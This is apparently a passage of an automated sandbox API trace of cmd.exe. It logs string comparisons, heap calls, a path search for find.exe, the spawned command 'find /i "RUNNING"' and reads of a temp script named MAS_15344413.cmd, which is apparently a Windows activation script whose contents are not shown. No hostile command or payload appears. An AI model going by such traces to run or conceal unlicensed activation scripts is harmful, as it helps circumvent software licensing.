_String2="RD") returned -12 [0174.794] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0174.794] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0174.794] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0174.794] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0174.794] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0174.794] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0174.794] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0174.794] _wcsicmp (_String1="find", _String2="VER") returned -16 [0174.794] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0174.794] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0174.794] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0174.794] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0174.794] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0174.794] _wcsicmp (_String1="find", _String2="START") returned -13 [0174.794] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0174.794] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0174.794] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0174.794] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0174.794] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0174.795] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0174.795] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0174.795] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0174.795] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0174.795] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0174.795] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0174.795] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0174.795] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0174.795] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0174.795] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0174.795] _wcsicmp (_String1="find", _String2="CD") returned 3 [0174.795] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0174.795] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0174.795] _wcsicmp (_String1="find", _String2="REN") returned -12 [0174.795] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0174.795] _wcsicmp (_String1="find", _String2="SET") returned -13 [0174.795] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0174.795] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0174.795] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0174.795] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0174.795] _wcsicmp (_String1="find", _String2="MD") returned -7 [0174.795] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0174.795] _wcsicmp (_String1="find", _String2="RD") returned -12 [0174.796] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0174.796] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0174.796] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0174.796] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0174.796] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0174.796] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0174.796] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0174.796] _wcsicmp (_String1="find", _String2="VER") returned -16 [0174.796] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0174.796] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0174.796] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0174.796] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0174.796] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0174.796] _wcsicmp (_String1="find", _String2="START") returned -13 [0174.796] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0174.796] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0174.796] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0174.796] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0174.796] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0174.796] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0174.796] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0174.796] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0174.796] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0174.796] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0174.796] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0174.797] _wcsicmp (_String1="find", _String2="IF") returned -3 [0174.797] _wcsicmp (_String1="find", _String2="REM") returned -12 [0174.797] GetProcessHeap () returned 0x19a8f1e0000 [0174.797] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.797] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0174.797] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0174.797] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0174.797] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0174.797] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0174.797] _wcsicmp (_String1="find", _String2="CD") returned 3 [0174.797] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0174.797] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0174.798] _wcsicmp (_String1="find", _String2="REN") returned -12 [0174.798] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0174.798] _wcsicmp (_String1="find", _String2="SET") returned -13 [0174.798] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0174.798] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0174.798] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0174.798] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0174.798] _wcsicmp (_String1="find", _String2="MD") returned -7 [0174.798] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0174.798] _wcsicmp (_String1="find", _String2="RD") returned -12 [0174.798] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0174.798] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0174.798] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0174.798] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0174.798] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0174.798] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0174.798] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0174.798] _wcsicmp (_String1="find", _String2="VER") returned -16 [0174.798] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0174.798] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0174.799] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0174.799] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0174.799] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0174.799] _wcsicmp (_String1="find", _String2="START") returned -13 [0174.799] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0174.799] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0174.799] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0174.799] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0174.799] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0174.799] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0174.799] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0174.799] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0174.799] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0174.799] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0174.799] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0174.799] GetProcessHeap () returned 0x19a8f1e0000 [0174.799] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ece20 [0174.799] SetErrorMode (uMode=0x0) returned 0x0 [0174.799] SetErrorMode (uMode=0x1) returned 0x0 [0174.800] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ece30, lpFilePart=0x43f9efeb00 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efeb00*="system32") returned 0x13 [0174.800] SetErrorMode (uMode=0x0) returned 0x1 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ece20, Size=0x42) returned 0x19a8f1ece20 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ece20) returned 0x42 [0174.800] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0174.800] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1eaed0 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0174.800] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0174.800] GetProcessHeap () returned 0x19a8f1e0000 [0174.800] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0174.801] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.801] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe880) returned 0x19a8f1f8ac0 [0174.801] FindClose (in: hFindFile=0x19a8f1f8ac0 | out: hFindFile=0x19a8f1f8ac0) returned 1 [0174.801] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe880) returned 0xffffffffffffffff [0174.802] GetLastError () returned 0x2 [0174.802] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe880, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe880) returned 0x19a8f1f8760 [0174.802] FindClose (in: hFindFile=0x19a8f1f8760 | out: hFindFile=0x19a8f1f8760) returned 1 [0174.802] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0174.802] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0174.802] GetProcessHeap () returned 0x19a8f1e0000 [0174.802] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb8f0 [0174.802] GetProcessHeap () returned 0x19a8f1e0000 [0174.802] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1ece80 [0174.802] GetProcessHeap () returned 0x19a8f1e0000 [0174.802] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x36) returned 0x19a8f1e0ab0 [0174.802] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0174.802] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ed0a0 [0174.803] SetErrorMode (uMode=0x0) returned 0x0 [0174.803] SetErrorMode (uMode=0x1) returned 0x0 [0174.803] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ed0b0, lpFilePart=0x43f9efe890 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x43f9efe890*="system32") returned 0x13 [0174.803] SetErrorMode (uMode=0x0) returned 0x1 [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ed0a0, Size=0x42) returned 0x19a8f1ed0a0 [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ed0a0) returned 0x42 [0174.803] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0174.803] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1ed100 [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1ed200 [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ed200, Size=0xf0) returned 0x19a8f1ed200 [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ed200) returned 0xf0 [0174.803] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0174.803] GetProcessHeap () returned 0x19a8f1e0000 [0174.803] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1ed300 [0174.804] GetProcessHeap () returned 0x19a8f1e0000 [0174.804] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ed300, Size=0x88) returned 0x19a8f1ed300 [0174.804] GetProcessHeap () returned 0x19a8f1e0000 [0174.804] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ed300) returned 0x88 [0174.804] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.804] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe610, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe610) returned 0x19a8f1f8c40 [0174.804] FindClose (in: hFindFile=0x19a8f1f8c40 | out: hFindFile=0x19a8f1f8c40) returned 1 [0174.804] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe610, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe610) returned 0xffffffffffffffff [0174.804] GetLastError () returned 0x2 [0174.804] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe610, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe610) returned 0x19a8f1f8d60 [0174.805] FindClose (in: hFindFile=0x19a8f1f8d60 | out: hFindFile=0x19a8f1f8d60) returned 1 [0174.805] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0174.805] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0174.805] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeb70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.805] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efea90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe990 | out: lpAttributeList=0x43f9efea90, lpSize=0x43f9efe990) returned 1 [0174.805] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efea90, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe97c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efea90, lpPreviousValue=0x0) returned 1 [0174.805] GetStartupInfoW (in: lpStartupInfo=0x43f9efea20 | out: lpStartupInfo=0x43f9efea20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0174.805] GetProcessHeap () returned 0x19a8f1e0000 [0174.806] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb6b0 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.806] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0174.807] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0174.807] GetProcessHeap () returned 0x19a8f1e0000 [0174.808] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.808] GetProcessHeap () returned 0x19a8f1e0000 [0174.808] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecdc0 [0174.808] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0174.808] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"RUNNING\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x43f9efe9b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"RUNNING\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe998 | out: lpCommandLine="find /i \"RUNNING\"", lpProcessInformation=0x43f9efe998*(hProcess=0x94, hThread=0x84, dwProcessId=0x1328, dwThreadId=0x1394)) returned 1 [0174.856] CloseHandle (hObject=0x84) returned 1 [0174.856] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0174.856] GetProcessHeap () returned 0x19a8f1e0000 [0174.857] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0174.857] GetEnvironmentStringsW () returned 0x19a8f1eeb50* [0174.857] GetProcessHeap () returned 0x19a8f1e0000 [0174.857] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb16) returned 0x19a8f1ef670 [0174.857] memcpy (in: _Dst=0x19a8f1ef670, _Src=0x19a8f1eeb50, _Size=0xb16 | out: _Dst=0x19a8f1ef670) returned 0x19a8f1ef670 [0174.857] FreeEnvironmentStringsA (penv="=") returned 1 [0174.857] GetProcessHeap () returned 0x19a8f1e0000 [0174.857] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecdc0) returned 1 [0174.857] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efea90 | out: lpAttributeList=0x43f9efea90) [0174.857] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0174.857] _close (_FileHandle=4) returned 0 [0174.857] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0175.048] GetExitCodeProcess (in: hProcess=0x98, lpExitCode=0x43f9efee18 | out: lpExitCode=0x43f9efee18*=0x0) returned 1 [0175.048] CloseHandle (hObject=0x98) returned 1 [0175.048] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0175.190] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0x43f9efee18 | out: lpExitCode=0x43f9efee18*=0x0) returned 1 [0175.190] CloseHandle (hObject=0x94) returned 1 [0175.190] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.190] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.190] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.190] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.191] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.191] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.191] SetConsoleInputExeNameW () returned 0x1 [0175.191] GetConsoleOutputCP () returned 0x1b5 [0175.191] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.191] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.192] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.192] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.192] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.192] SetFilePointer (in: hFile=0x94, lDistanceToMove=2311, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x907 [0175.192] GetProcessHeap () returned 0x19a8f1e0000 [0175.193] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed300) returned 1 [0175.193] GetProcessHeap () returned 0x19a8f1e0000 [0175.193] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed200) returned 1 [0175.193] GetProcessHeap () returned 0x19a8f1e0000 [0175.193] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed100) returned 1 [0175.193] GetProcessHeap () returned 0x19a8f1e0000 [0175.194] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ed0a0) returned 1 [0175.194] GetProcessHeap () returned 0x19a8f1e0000 [0175.194] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ab0) returned 1 [0175.194] GetProcessHeap () returned 0x19a8f1e0000 [0175.194] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece80) returned 1 [0175.194] GetProcessHeap () returned 0x19a8f1e0000 [0175.195] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.195] GetProcessHeap () returned 0x19a8f1e0000 [0175.195] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0175.195] GetProcessHeap () returned 0x19a8f1e0000 [0175.195] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0175.195] GetProcessHeap () returned 0x19a8f1e0000 [0175.196] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0175.196] GetProcessHeap () returned 0x19a8f1e0000 [0175.196] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0175.196] GetProcessHeap () returned 0x19a8f1e0000 [0175.196] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0175.196] GetProcessHeap () returned 0x19a8f1e0000 [0175.196] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea970) returned 1 [0175.196] GetProcessHeap () returned 0x19a8f1e0000 [0175.197] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, 